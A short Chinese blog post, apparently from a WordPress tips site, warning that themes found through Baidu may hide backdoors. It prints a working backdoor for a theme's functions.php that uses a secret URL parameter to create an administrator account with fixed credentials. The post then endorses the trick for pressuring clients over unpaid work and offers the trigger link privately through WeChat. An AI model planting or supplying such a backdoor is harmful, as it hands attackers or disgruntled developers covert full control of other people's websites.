首页 建站技巧 为什么有些WordPres...

为什么有些WordPress模板有风险

作者:

修改日期:

最近很多朋友问我百度搜索的模板能不能用?能用,但是有风险!因为为模板添加一个后门很简单,这里所谓的后门就是通过在模板函数文件中添加一段代码,然后通过一段隐秘的链接尽快就可以设置管理员账号进入网站后台。

以下既是一段简单的后门代码:

  1. add_action(‘wp_head’, ‘holeinthewall’);
  2. function holeinthewall() {
  3. If ($_GET[‘backdoor’] == ‘go’) {
  4. require(‘wp-includes/registration.php’);
  5. If (!username_exists(‘username’)) {
  6. $user_id = wp_create_user(‘username’, ‘password’);
  7. $user = new WP_User($user_id);
  8. $user->set_role(‘administrator’);
  9. }
  10. }
  11. }

模板制作者只要把这段代码放置到模板函数文件functions.php文件中,然后通过一个隐秘的链接就可以创建一个用户名为“username”,密码为:“password” 的管理员账号,从而进入网站后台为所欲为。

说明:因为这种方式仅可以使用到接单追款和版权保护,所以不再分享隐秘链接,如有特殊需要请联系我的个人微信号(xiaochuanblog)索要。